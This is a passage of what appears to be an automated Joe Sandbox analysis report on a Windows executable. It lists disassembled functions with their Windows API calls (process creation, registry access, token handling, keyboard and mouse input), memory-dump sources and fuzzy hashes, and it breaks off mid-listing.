                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 0048B644
                                                                                                                                                  • _memset.LIBCMT ref: 0048B653
                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,004C6F20,004C6F64), ref: 0048B682
                                                                                                                                                  • CloseHandle.KERNEL32 ref: 0048B694
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memset$CloseCreateHandleProcess
                                                                                                                                                  • String ID: oL$doL
                                                                                                                                                  • API String ID: 3277943733-3421622115
                                                                                                                                                  • Opcode ID: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                                                                                  • Instruction ID: 7a1fecbce043cfc874fe0d77b44da30ff063324afa3e4e90fef9887594455fd0
                                                                                                                                                  • Opcode Fuzzy Hash: f6592324f54b6d11ff0072cf87150bc2a8f8a0fa5e3a8a7e269d397b8f6a706e
                                                                                                                                                  • Instruction Fuzzy Hash: 20F05EB26403107AE2502761BC06FBB3A9CEB08395F41843ABE08E5192D7799C00C7AC
                                                                                                                                                  Function 0042406B Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 19libraryloaderCOMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • LoadLibraryExW.KERNEL32(combase.dll,00000000,00000800,RoUninitialize,00423F85), ref: 00424085
                                                                                                                                                  • GetProcAddress.KERNEL32(00000000), ref: 0042408C
                                                                                                                                                  • EncodePointer.KERNEL32(00000000), ref: 00424097
                                                                                                                                                  • DecodePointer.KERNEL32(00423F85), ref: 004240B2
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Pointer$AddressDecodeEncodeLibraryLoadProc
                                                                                                                                                  • String ID: RoUninitialize$combase.dll
                                                                                                                                                  • API String ID: 3489934621-2819208100
                                                                                                                                                  • Opcode ID: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                                                                                  • Instruction ID: 3c20c996fd7074992a56bc66f3091c9a5c2557e351e9bc0918c4c0f6e68dcf68
                                                                                                                                                  • Opcode Fuzzy Hash: a073a7a123edb79e47074a0cfae65335df484428d24780242fe31235a0946bf9
                                                                                                                                                  • Instruction Fuzzy Hash: DBE09270681200AFEA90AF62ED0DB8A3AA5B704743F14893AF501E11A0CFBA46489B1C
                                                                                                                                                  Function 00AB44E9 Relevance: 9.2, APIs: 6, Instructions: 216COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000000,?,?,00000000,00000000,00000100,?,00000000,?,?,?,00AB473A,?,?,00000000), ref: 00AB4543
                                                                                                                                                  • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?,?,?,?,00AB473A,?,?,00000000,?,?,?), ref: 00AB45C9
                                                                                                                                                  • WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000400,00000000,?,00000000,00000000,00000000,00000000), ref: 00AB46C3
                                                                                                                                                  • __freea.LIBCMT ref: 00AB46D0
                                                                                                                                                    • Part of subcall function 00AB32FA: RtlAllocateHeap.NTDLL(00000000,?,?), ref: 00AB332C
                                                                                                                                                  • __freea.LIBCMT ref: 00AB46D9
                                                                                                                                                  • __freea.LIBCMT ref: 00AB46FE
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ByteCharMultiWide__freea$AllocateHeap
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1414292761-0
                                                                                                                                                  • Opcode ID: a2345af1fd97a9099c70e8408b1957244f312d9d45a4becd33e1ae9957c01512
                                                                                                                                                  • Instruction ID: 1c94ce7b03744bd6742b3260bb73050bc4cc324fc0880492fab164dc40b9b526
                                                                                                                                                  • Opcode Fuzzy Hash: a2345af1fd97a9099c70e8408b1957244f312d9d45a4becd33e1ae9957c01512
                                                                                                                                                  • Instruction Fuzzy Hash: 52510E72600606ABEF258F68CC51EEF77ADEB49710F154629FD04DA193EB34DC60C650
                                                                                                                                                  Function 004664B8 Relevance: 9.2, APIs: 6, Instructions: 205COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _memmove$__itow__swprintf
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3253778849-0
                                                                                                                                                  • Opcode ID: 31b6c2821ee95968e36053ace308b28e5e0a31ebdb0f388184579a3ae126733f
                                                                                                                                                  • Instruction ID: 21da70feb02ff46742cf7b1a596b1e1f747712b30ca55ffc0ed3d6fa2aea8e56
                                                                                                                                                  • Opcode Fuzzy Hash: 31b6c2821ee95968e36053ace308b28e5e0a31ebdb0f388184579a3ae126733f
                                                                                                                                                  • Instruction Fuzzy Hash: 6261707160025A9BCF01EF61DC81AFE37A5AF05308F45452EF8556B293EB38AD05CB5A
                                                                                                                                                  Function 004801E4 Relevance: 9.2, APIs: 6, Instructions: 167registryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                                                                                                                                    • Part of subcall function 00480E1A: CharUpperBuffW.USER32(?,?,?,?,?,?,?,0047FDAD,?,?), ref: 00480E31
                                                                                                                                                  • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004802BD
                                                                                                                                                  • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004802FD
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,00000001,00000000), ref: 00480320
                                                                                                                                                  • RegEnumValueW.ADVAPI32(?,-00000001,?,?,00000000,?,00000000,00000000), ref: 00480349
                                                                                                                                                  • RegCloseKey.ADVAPI32(?,?,00000000), ref: 0048038C
                                                                                                                                                  • RegCloseKey.ADVAPI32(00000000), ref: 00480399
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Close$BuffCharConnectEnumOpenRegistryUpperValue_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4046560759-0
                                                                                                                                                  • Opcode ID: 3a69bb563f7b8a3e4012be6cf6d288248e8626f982930bec9f4d163de4be7317
                                                                                                                                                  • Instruction ID: d871ff08e979a7a46cd08627f86c845b9cb8169993b1d7d4ad27b4e2648fe78e
                                                                                                                                                  • Opcode Fuzzy Hash: 3a69bb563f7b8a3e4012be6cf6d288248e8626f982930bec9f4d163de4be7317
                                                                                                                                                  • Instruction Fuzzy Hash: 68515C71118204AFC710EF65C885E6FBBE8FF85318F04492EF945972A2DB35E909CB56
                                                                                                                                                  Function 0045EEEC Relevance: 9.2, APIs: 6, Instructions: 159COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • VariantInit.OLEAUT32(?), ref: 0045EF06
                                                                                                                                                  • VariantClear.OLEAUT32(00000013), ref: 0045EF78
                                                                                                                                                  • VariantClear.OLEAUT32(00000000), ref: 0045EFD3
                                                                                                                                                  • _memmove.LIBCMT ref: 0045EFFD
                                                                                                                                                  • VariantClear.OLEAUT32(?), ref: 0045F04A
                                                                                                                                                  • VariantChangeType.OLEAUT32(?,?,00000000,00000013), ref: 0045F078
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Variant$Clear$ChangeInitType_memmove
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1101466143-0
                                                                                                                                                  • Opcode ID: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                                                                                  • Instruction ID: 3df6c570488be2a998a5abfaea7cf2d50daf9fdb1352742cca5bf42246c3e2d0
                                                                                                                                                  • Opcode Fuzzy Hash: 3a696c756d5f9f21b3064a47137a411a2eda9f735d8382ec367d4cfec0c8664e
                                                                                                                                                  • Instruction Fuzzy Hash: 04517D75A00209EFCB14CF58C884AAAB7B8FF4C314B15856AED49DB342E334E915CF94
                                                                                                                                                  Function 0046220A Relevance: 9.1, APIs: 6, Instructions: 138windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • _memset.LIBCMT ref: 00462258
                                                                                                                                                  • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 004622A3
                                                                                                                                                  • IsMenu.USER32(00000000), ref: 004622C3
                                                                                                                                                  • CreatePopupMenu.USER32 ref: 004622F7
                                                                                                                                                  • GetMenuItemCount.USER32(000000FF), ref: 00462355
                                                                                                                                                  • InsertMenuItemW.USER32(00000000,?,00000001,00000030), ref: 00462386
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Menu$Item$CountCreateInfoInsertPopup_memset
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3311875123-0
                                                                                                                                                  • Opcode ID: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                                                                                  • Instruction ID: 667f6c59849a63ea2ae133147cac6ec600f1389f3bfda063d60b04a3024e98c7
                                                                                                                                                  • Opcode Fuzzy Hash: cf97df88117ddcc5f0fa513269a15dde7708b163d82bf74e49b6c8debfa24165
                                                                                                                                                  • Instruction Fuzzy Hash: 0F51A370500649FBDF21CF64CA44B9EBBF5BF05318F10456AE81197390E3B88985CB5B
                                                                                                                                                  Function 0048B69E Relevance: 9.1, APIs: 6, Instructions: 109windowCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • ShowWindow.USER32(004C57B0,00000000,00B834B0,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B712
                                                                                                                                                  • EnableWindow.USER32(00000000,00000000), ref: 0048B736
                                                                                                                                                  • ShowWindow.USER32(004C57B0,00000000,00B834B0,?,?,004C57B0,?,0048B5A8,?,?), ref: 0048B796
                                                                                                                                                  • ShowWindow.USER32(00000000,00000004,?,0048B5A8,?,?), ref: 0048B7A8
                                                                                                                                                  • EnableWindow.USER32(00000000,00000001), ref: 0048B7CC
                                                                                                                                                  • SendMessageW.USER32(?,0000130C,?,00000000), ref: 0048B7EF
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Show$Enable$MessageSend
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 642888154-0
                                                                                                                                                  • Opcode ID: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                                                                                  • Instruction ID: 1d3b34d551e73e97491640bec01ce8c12bc83bc2c135b759935fb039f22faf4f
                                                                                                                                                  • Opcode Fuzzy Hash: 7ca0fe6c9807323bcc0ac8ff00a913c3fb6576fd02a22b3a16232a66ac7b93cd
                                                                                                                                                  • Instruction Fuzzy Hash: 1941A834600340AFDB21DF28C499B9A7BE0FF49310F5845BAF9488F762C735A856CB94
                                                                                                                                                  Function 0047709E Relevance: 9.1, APIs: 6, Instructions: 97COMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetForegroundWindow.USER32(?,?,?,?,?,?,00474E41,?,?,00000000,00000001), ref: 004770AC
                                                                                                                                                    • Part of subcall function 004739A0: GetWindowRect.USER32(?,?), ref: 004739B3
                                                                                                                                                  • GetDesktopWindow.USER32 ref: 004770D6
                                                                                                                                                  • GetWindowRect.USER32(00000000), ref: 004770DD
                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000001,00000001), ref: 0047710F
                                                                                                                                                    • Part of subcall function 00465244: Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                                                                                                                                  • GetCursorPos.USER32(?), ref: 0047713B
                                                                                                                                                  • mouse_event.USER32(00008001,?,?,00000000,00000000), ref: 00477199
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Window$Rectmouse_event$CursorDesktopForegroundSleep
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 4137160315-0
                                                                                                                                                  • Opcode ID: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                                                                                  • Instruction ID: 96178dbc809958a90b6454061f905f6e8cc6bb80431ab620535fad6e804f8cbf
                                                                                                                                                  • Opcode Fuzzy Hash: 3cdeb131284200fba8ef2e28f13c3857e1f37640968ff1f5e935f4a9860c8469
                                                                                                                                                  • Instruction Fuzzy Hash: 2131D472605305ABD720DF14D849B9FB7A9FF88314F40092EF58997291D734EA09CB9A
                                                                                                                                                  Function 00458879 Relevance: 9.1, APIs: 6, Instructions: 69memoryCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                    • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,?,00000000,?), ref: 004580C0
                                                                                                                                                    • Part of subcall function 004580A9: GetLastError.KERNEL32(?,00000002,?,00000000,?), ref: 004580CA
                                                                                                                                                    • Part of subcall function 004580A9: GetProcessHeap.KERNEL32(00000008,?,?,00000002,?,00000000,?), ref: 004580D9
                                                                                                                                                    • Part of subcall function 004580A9: HeapAlloc.KERNEL32(00000000,?,00000002,?,00000000,?), ref: 004580E0
                                                                                                                                                    • Part of subcall function 004580A9: GetTokenInformation.ADVAPI32(?,00000002,00000000,?,?,?,00000002,?,00000000,?), ref: 004580F6
                                                                                                                                                  • GetLengthSid.ADVAPI32(?,00000000,0045842F), ref: 004588CA
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000008,00000000), ref: 004588D6
                                                                                                                                                  • HeapAlloc.KERNEL32(00000000), ref: 004588DD
                                                                                                                                                  • CopySid.ADVAPI32(00000000,00000000,?), ref: 004588F6
                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,0045842F), ref: 0045890A
                                                                                                                                                  • HeapFree.KERNEL32(00000000), ref: 00458911
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Heap$Process$AllocInformationToken$CopyErrorFreeLastLength
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3008561057-0
                                                                                                                                                  • Opcode ID: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                  • Instruction ID: 7059436e0a451666cc74b436c7695f43cca8d294219cfb63d8684b6348989bdb
                                                                                                                                                  • Opcode Fuzzy Hash: 899df585734c4cf6e549910b9baf9cc1d52bbabddfc3f51843167315329ebb0f
                                                                                                                                                  • Instruction Fuzzy Hash: 8E11AF71501609FFDB109FA4DC09BBFB7A8EB45316F10442EE845A7211CF3AAD18DB69
                                                                                                                                                  Function 004585B1 Relevance: 9.1, APIs: 6, Instructions: 65processCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000A,00000004), ref: 004585E2
                                                                                                                                                  • OpenProcessToken.ADVAPI32(00000000), ref: 004585E9
                                                                                                                                                  • CreateEnvironmentBlock.USERENV(?,00000004,00000001), ref: 004585F8
                                                                                                                                                  • CloseHandle.KERNEL32(00000004), ref: 00458603
                                                                                                                                                  • CreateProcessWithLogonW.ADVAPI32(?,?,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00458632
                                                                                                                                                  • DestroyEnvironmentBlock.USERENV(00000000), ref: 00458646
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737358900.0000000000401000.00000020.00000001.01000000.00000009.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                  • Associated: 00000001.00000002.1737309382.0000000000400000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.000000000048F000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737471158.00000000004B4000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737544397.00000000004BE000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737568181.00000000004C7000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737611454.000000000050F000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  • Associated: 00000001.00000002.1737640256.0000000000516000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_400000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: Process$BlockCreateEnvironment$CloseCurrentDestroyHandleLogonOpenTokenWith
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 1413079979-0
                                                                                                                                                  • Opcode ID: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                                                                                  • Instruction ID: 159165bab53b04d3cbba9e0d8ed23f629fb96fbb8b96a1f823f3c86320dce82d
                                                                                                                                                  • Opcode Fuzzy Hash: 594d4e30fb024ea406b8e6751db59f03e6ebc423b2dce8d7814a5cb8bfdeea6b
                                                                                                                                                  • Instruction Fuzzy Hash: 7111597250120DBBDF018FA4DD49BEF7BA9EF08305F144069FE04A2161CB769E69EB64
                                                                                                                                                  Function 00AB185B Relevance: 9.0, APIs: 6, Instructions: 50COMMONLIBRARYCODE
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000001.00000002.1737982563.0000000000A70000.00000040.00001000.00020000.00000000.sdmp, Offset: 00A70000, based on PE: false
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_1_2_a70000_x.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$_free$_abort
                                                                                                                                                  • String ID:
                                                                                                                                                  • API String ID: 3160817290-0
                                                                                                                                                  • Opcode ID: 64ec4282e25c1459125a5ea3e30949a63c8711ab89f005b7e89085bcf4662bbd
                                                                                                                                                  • Instruction ID: 60e31afd2f89d99b0bccabaf28d79b2b0764bd974783fab16a207fbe079a81d2
                                                                                                                                                  • Opcode Fuzzy Hash: 64ec4282e25c1459125a5ea3e30949a63c8711ab89f005b7e89085bcf4662bbd
                                                                                                                                                  • Instruction Fuzzy Hash: 6EF028321406003BC211B3F86D1AFEA26AEBBC1761FA50236F815D62A3FF618C038311
                                                                                                                                                  Function 00420162 Relevance: 9.0, APIs: 6, Instructions: 44keyboardCOMMON
                                                                                                                                                  Download Yara Rule
                                                                                                                                                  APIs
                                                                                                                                                  • MapVirtualKeyW.USER32(0000005B,00000000), ref: 00420193
                                                                                                                                                  • MapVirtualKeyW.USER32(00000010,00000000), ref: 0042019B
                                                                                                                                                  • MapVirtualKeyW.USER32(000000A0,00000000), ref: 004201A6
                                                                                                                                                  • MapVirtualKeyW.USER32(000000A1,00000000), ref: 004201B1
                                                                                                                                                  • MapVirtualKeyW.USER32(00000011,00000000), ref: 004201B9
